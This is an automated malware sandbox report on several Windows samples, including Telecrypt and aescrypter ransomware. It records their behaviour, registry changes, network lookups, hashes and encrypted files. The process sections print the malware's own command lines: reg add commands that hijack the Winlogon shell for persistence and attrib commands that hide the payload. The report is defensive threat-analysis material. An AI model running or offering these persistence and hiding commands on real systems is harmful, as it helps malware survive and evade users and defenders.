N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Telecrypt.a.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/2288-0-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2288-2-0x0000000000400000-0x0000000000721000-memory.dmp

memory/2288-3-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2288-23-0x0000000000400000-0x0000000000721000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240708-en

Max time kernel

292s

Max time network

264s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe, C:\\Program Files\\Common Files\\qip\\svhost.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe, C:\\Program Files\\Common Files\\qip\\svhost.exe" C:\Windows\SysWOW64\reg.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\netprotocol.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe N/A
N/A N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Netprotocol = "C:\\Users\\Admin\\AppData\\Roaming\\netprotocol.exe" C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\qip C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\Common Files\qip\svhost.exe C:\Windows\SysWOW64\attrib.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
PID 2808 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
PID 2808 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
PID 2808 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe
PID 1748 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2828 N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe C:\Users\Admin\AppData\Roaming\netprotocol.exe
PID 2692 wrote to memory of 2828 N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe C:\Users\Admin\AppData\Roaming\netprotocol.exe
PID 2692 wrote to memory of 2828 N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe C:\Users\Admin\AppData\Roaming\netprotocol.exe
PID 2692 wrote to memory of 2828 N/A C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe C:\Users\Admin\AppData\Roaming\netprotocol.exe
PID 1748 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2168 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2168 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2168 wrote to memory of 376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2604 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2604 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2604 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2604 wrote to memory of 844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2628 wrote to memory of 264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2628 wrote to memory of 264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2628 wrote to memory of 264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2628 wrote to memory of 264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2616 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2616 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2616 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2616 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\svhost.exe" "C:\Program Files\Common Files\qip\svhost.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f

C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe

C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\qip\svhost.exe"

C:\Users\Admin\AppData\Roaming\netprotocol.exe

C:\Users\Admin\AppData\Roaming\netprotocol.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\qip"

C:\Windows\SysWOW64\reg.exe

reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f

C:\Windows\SysWOW64\reg.exe

reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "Explorer.exe, C:\Program Files\Common Files\qip\svhost.exe" /f

C:\Windows\SysWOW64\attrib.exe

attrib +h "C:\Program Files\Common Files\qip"

C:\Windows\SysWOW64\attrib.exe

attrib +h "C:\Program Files\Common Files\qip\svhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 hestemer.com udp
US 8.8.8.8:53 hestemer.com udp
US 8.8.8.8:53 aguels.com udp
US 8.8.8.8:53 kasjchseuk.com udp
US 8.8.8.8:53 krexjdsamdx.com udp

Files

memory/1748-1-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1748-0-0x0000000000020000-0x0000000000022000-memory.dmp

C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\1.exe

MD5 7f550991510e8dd336b4321d719279b7
SHA1 3070f320a8f184ab1193dfc8cbfde6d5f91964c3
SHA256 905246be7f2ac87e583b541364513dd82a10e4751c615e6490ab80be6825f48c
SHA512 d0b6bad92cf6d6f8a98f0f343fdc6cb6b5a1e38c0fffa4b7209e0f3677aec8ddb8d678b55c3273aa59f9924353337a898dc74d85663321cda755ff36f9f0f858

memory/2808-8-0x0000000000120000-0x000000000015A000-memory.dmp

memory/1748-24-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2828-22-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2692-21-0x0000000000270000-0x00000000002AA000-memory.dmp

memory/2692-13-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2808-12-0x0000000000120000-0x000000000015A000-memory.dmp

C:\Users\Admin\AppData\Roaming\netprotocol.exe

MD5 c6e74cb0d7e7360d2815233db46955c8
SHA1 02564a38bdac76485b63733636df50038f2b46c0
SHA256 b707cc9a8f323a32054401eb2e41dc88f49c727956cddb1f540793ba896cc41e
SHA512 2ef09cecec6313a5ee8b2023bb6cc2e812dd2ff7c670d2c9f7e75576f53c987cf115b84f8e2795429d431168b1c232acbea61afe00b47ed488cf03ecd9481487

memory/2808-25-0x0000000000120000-0x000000000015A000-memory.dmp

memory/2692-26-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2828-27-0x0000000000400000-0x000000000043A000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

298s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe"

Signatures

Renames multiple (1213) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\ucsvcsh.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\ucsvcsh.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\ucsvcsh.exe N/A
N/A N/A C:\Windows\SysWOW64\ucsvcsh.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\ucsvcsh.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A
N/A N/A C:\ProgramData\local\aescrypter.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend C:\Windows\SysWOW64\reg.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Windows\SysWOW64\dcomcnfgui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\local\\svchost.exe" C:\Windows\SysWOW64\REG.exe N/A

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\ucsvcsh.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File opened for modification C:\Windows\SysWOW64\tcpsvcss.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File opened for modification C:\Windows\SysWOW64\tracerpts.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File opened for modification C:\Windows\SysWOW64\csrsstub.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\ucsvcsh.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259465386 C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\__rar_0.800 N/A N/A
File opened for modification C:\Windows\SysWOW64\dcomcnfgui.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\tracerpts.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259452984 C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\tcpsvcss.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File opened for modification C:\Windows\SysWOW64\wcmtstcsys.sss C:\Windows\SysWOW64\dcomcnfgui.exe N/A
File created C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259445559 C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\csrsstub.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A
File created C:\Windows\SysWOW64\dcomcnfgui.exe C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\7-Zip\Lang\ps.txt.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mn.txt.aes C:\ProgramData\local\aescrypter.exe N/A
